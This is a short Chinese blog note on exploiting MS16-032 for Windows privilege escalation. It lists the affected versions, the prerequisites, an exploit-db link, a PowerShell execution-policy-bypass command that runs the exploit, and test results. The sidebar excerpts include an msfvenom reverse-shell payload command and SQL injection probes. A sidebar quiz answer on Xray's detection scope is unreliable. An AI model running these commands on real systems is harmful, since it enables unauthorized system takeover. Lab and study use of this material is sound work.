MS16-032 提权

最新推荐文章于 2023-03-04 14:21:12 发布
最新推荐文章于 2023-03-04 14:21:12 发布
阅读量1k 收藏 1
点赞数
分类专栏: 内网渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/prettyX/article/details/106795028
版权

MS16-032

  • 补丁编号:KB3139914
  • 影响系统版本:Windows Vista、Windows 7、Windows 8.1、Windows 10、Windows 2008 Server、Windows 2012 Server
  • 漏洞利用脚本下载地址:https://www.exploit-db.com/exploits/39719
  • 系统要求:系统至少有2个以上CPU核心,否则利用脚本无法运行;PowerShell v2.0及以上版本
  • 测试命令: 
    powershell.exe -exec bypass -Command "& {Import-Module .\39719.ps1;Invoke-MS16-032 -Application cmd.exe}"

     

  • 测试结果(仅供参考):
  1. Win7 Ultimate SP1 32位、64位提权成功。
  2. Windows 10 企业版 10.0.18362 X64、Win10 Pro 10.0.10240 X64、Win10 Pro 10.0.18362 X64未能提权成功。

 

 

prettyX
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MS16-032提权正确方法
weixin_30311605的博客
03-18 1229
原版MS16-032提权会Spawn一个System Shell出来,只能通过Remote Desktop获取。这里修改exploit,直接反弹Shell。注意MS16-032依赖 thread handle,如果提了很多次后, thread handle用尽也无法成功。 root@kali:/tmp# wget https://raw.githubusercontent.com/samratas...
ms16-032本地溢出漏洞
最新发布
06-27
ms16-032本地溢出漏洞
QD77MS16 范例程序
03-17
QD77MS16 范例程序,本人上机测试过
M_D77MS16 FB库
11-23
M_D77MS16 FB库 M_D77MS16 FB库 M_D77MS16 FB库 M_D77MS16 FB库
三菱PLC QD77ms16视频教程 QD77MS4视频教学 QD77教程视频+程序+手册资料 讲解教程.zip
01-04
本套视频14集 总大小约1个G 教程视频约3个多小时 整体包含 视频+程序+手册 全套14类目如下 第1集 QD77介绍 第2集 参数介绍 第3集 QD77内部缓存器参数 第4集 QD77ms视频教程 MS2 ms4 MS16的JOG及原点程序讲解 第5集 定位控制的几种方式 第6集 让马达按规定速度一直转动 一直正转或者反转 第7集 中途走了一节 停止了 如何重新启动 第8集 当前定位数据监控 和如何将当前位置清零 第9集 M代码使用 第10集 直线插补 圆弧插补教程 第11集 16轴测试程序例子讲解 第12集 QD77 驱动器参数设置 13集凸伦 编程1 14集凸伦 编程2 注意 视频,需要下载到电脑,下载后有个视频专用播放器。解压出来,然后用它去打开视频。 需要发播放密码就可以播放(密码不需要另外收费的)有什么问题找我
【安全】靶场实战-通过MS16-032提权
03-04 939
该漏洞影响从Vista到Windows 10的所有Windows版本(包括服务器版本)。Windows 7Windows 10目标系统需要有2个以上的CPU核心。PowerShell v2.0及更高版本必须正在运行。可根据MS16-032(KB3139914)补丁是否安装,来判断当前版本是否可利用。
利用ms16-032提权并打开3389端口
qq_45405155的博客
12-27 1324
利用ms16-032提权并打开3389端口 1、在VM中创建win 2003,在win2003上安装iis服务并开启服务 2、配置iis服务 3、上传源码及配置网站 给put文件设置权限,添加iis访问权限 设置默认访问页面 index.asp 访问192.168.x.x 4、修改checksql文件进行sql注入 判断注入点 http://192.168.8.130/shownews.asp?id=275 and 1=1 http://192.168.8.130/shownews.asp?id=2
MS16-032 提权 漏洞复现
Adminxe的博客
06-14 2198
exploit-db的详情:https://www.exploit-db.com/exploits/39574/ 注意点:此漏洞影响从Vista到Windows 10的所有Windows版本(包括服务器版本)以及为了实现利用,因为PowerShell脚本指示需要满足以下要求:目标系统需要有2个以上的CPU核心 PowerShell v2.0及更高版本必须正在运行 此漏洞会影响以下Microsoft产品: Windows Vista Windows 7 Windows 8.1 Windows 1...
ms16_032系统提权
a439017985的博客
02-24 1465
1.利用msfvenom生成木马 msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 13 -b '\x00\xfff\x0a' lhost=10.10.10.128 --platform windows lport=443 -f exe >/root/test.exe 2.在msf下开启监听 use ex
MS16-032 漏洞复现
EC_Carrot的博客
04-07 616
漏洞背景 Secondary Logon Service是其中的一个辅助登录服务。 Microsoft Windows的辅助登录服务存在特权提升漏洞,该漏洞源于程序没有正确管理内存中的请求句柄。本地攻击者可利用该漏洞以管理员身份运行任意代码。 微软在2016年3月8日已经更新了该漏洞的补丁文件KB3139914 影响范围 Microsoft Windows Vista SP2 Windows Server 2008 SP2和R2 SP1 Windows 7 SP1 Windows 8.1 Windows
三菱PLC QD77MS QD77MS16定位模块视频 编程讲解教程+使用手册+程序样例.zip
06-15
本套视频14集 总大小约1个G 教程视频约3个多小时 整体包含 视频+程序+手册 全套14类目如下 第1集 QD77介绍 第2集 参数介绍 第3集 QD77内部缓存器参数 第4集 QD77ms视频教程 MS2 ms4 MS16的JOG及原点程序讲解 第5集 定位控制的几种方式 第6集 让马达按规定速度一直转动 一直正转或者反转 第7集 中途走了一节 停止了 如何重新启动 第8集 当前定位数据监控 和如何将当前位置清零 第9集 M代码使用 第10集 直线插补 圆弧插补教程 第11集 16轴测试程序例子讲解 第12集 QD77 驱动器参数设置 13集凸伦 编程1 14集凸伦 编程2
基于STM32实现W25Q16读写操作(spi)
weixin_46155589的博客
12-20 6992
在之前我们学习了flash闪存,这个更多的是内部数据存储,容量也是会比较小。这次我们来学习一下更多的存储单元w25q16,顺便了解spi———串行外围设备接口。在我们的核心板子上基本都会有这么一块芯片,只是有的容量会计较大,大家可以查看板子的原理图,如图所示:有的板子可能是w25q32或者其他,后面的数字代表的是容量,用法都是一样的,从图中或者产品手册我们可以看到芯片是spi协议通信的。串行外设接口 (SPI) 可与外部器件进行半双工/全双工的同步串行通信。
关于ms16-032复现在win7的一些坑(不联网环境下)
weixin_42146445的博客
12-17 601
1.得先允许执行脚本 set-ExecutionPolicy RemoteSigned 要不然是不允许执行.ps1脚本的 2.powershell import 由于没联网,所以我把github上面的invoke_ms16-032.ps1下载下来了。 先用powershell 命令进入powershell命令行。 然后得先执行 import-moudle .\invoke_ms-...
Metasploit学习笔记(五)——Meterpreter后渗透之WMIC实战MS16-032本地溢出漏洞
Zichel77的博客
10-09 1303
比如KiTrap0D (KB979682) 、MS11-011 (KB2393802) 、MS11-080(KB2592799),然后使用没有编。因为虚拟机不怎么打补丁,所以我们可以使用很多EXP来提权,这里就用最新的MS16-032来尝试提权,对应的编号是KB3139914。可以看到目标机只打了3个补丁,要注意这些输出的结果是不能被直接利用的,使用的方式是去找提权的EXP,然后将系统已经安装的补。过程简单来说就是这几步,成功利用反弹shell后就是Meterpreter了。在WIN7中查看补丁信息。
Ldapsearch
prettyX的博客
08-01 5959
这里我们学习Ldapsearch的用法,主要是获取域中用户、主机、用户组、指定用户组中的用户信息 测试环境 域控:Windows 2016,域名:test.lab 测试主机:未加入域,和域控在一个网段,Kali Ldapsearch的使用 1、Ldapsearch介绍 由OpenLDAP Project项目组开发维护,一个在Shell环境下进行调用ldap_search_exe库进行LDAP搜素的工具。Kali中默认安装 LDAP和Windows AD的关系:Active Directory=L
m0n0wall 软件防火墙 虚拟机中 安装与配置
prettyX的博客
01-14 5199
0X00 内容 m0n0wall 在虚拟机中安装与配置 策略配置 0X01m0n0wall 在虚拟机中安装与配置 m0n0wall:是基于FreeBSD内核开发的免费软件防火墙。m0n0wall提供基于Web的配置管理、支持DHCP Server、DNS转发、动态DNS、IPSec、流量控制、无线网络的支持。 m0n0wall下载地址: https://m0n0.ch/wal...
通向域控思路总结
prettyX的博客
03-31 4577
一、渗透路线的确认 1、DMZ区的一般是一些虚拟化的服务器;注意流量不能过大;流量加密; 2、维护好入口点; 3、寻找另一台跳板机; 4、判断当前所处的位置,如果在DMZ,可以注意寻找多网卡主机,出DMZ; 5、利用在服务器中搜集到的账号密码,尝试枚举连接LDAP等,并尝试获取域内普通用户权限; 6、进一步的信息收集,包括SPN扫描,和所获取的域用户权限获取域信息,以及周围主机信息; 7、利用常规渗透手法拿下域控:委派、非约束委派,CVE漏洞、定位管理员、PTH、令牌窃取等 二、CVE漏洞利
0XID定位多网卡主机 使用记录
prettyX的博客
04-03 4393
1、0XID Resolver是在支持COM+的每台计算机上运行的服务,有两项重要职责: 它存储与远程对象连接所需的RPC字符串绑定,并将其提供给本地客户端 它将Ping消息发送到本地计算机具有客户端的远程对象,并接收在本地计算机上运行的对象的Ping消息。0XID解析器的此方面支持COM+垃圾回收机制。 2、使用条件: k8大佬总结的,附上截图 下图是老外的原文 我们可以在实际环境中,自己进行测试 3、附上原作者的代码,可以根据自己的需要进行二次开发,添加多线程部分、支持IP段等。..
入侵防御系统 IPS
prettyX的博客
01-09 4186
入侵防御系统简介 Intrusion Prevention System:IPS 位于防火墙和网络的设备之间,依靠对数据包的检测进行防御(检查入网的数据包,确定数据包的真正用途,然后决定是否允许其进入内网)。 能够监视网络或网络设备的网络资料传输行为的计算机网络安全设备,能够及时的中断、调整或隔离一些不正常或是具有伤害性的网络资料传输行为。 防火墙可以拦截底层攻击行为,但对应用层的深层...
6.Xray工具可以发现下面哪种漏洞(2分) A.XSS B.shiro C. ms17-017 D. ms16-075
06-13
正确答案是 A。Xray 是一款功能强大的 Web 漏洞扫描工具,可以发现多种类型的漏洞,包括 XSS、SQL 注入、文件包含等。而在选项中,只有 XSS 漏洞是可以被 Xray 发现的,其他的漏洞类型不在 Xray 的扫描范围之内。因此,选项 A 是正确答案。选项 B 中的 shiro 是一个 Java 安全框架,不是漏洞类型。选项 C 和 D 中的 ms17-017 和 ms16-075 是 Windows 操作系统的漏洞编号,也不是漏洞类型。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值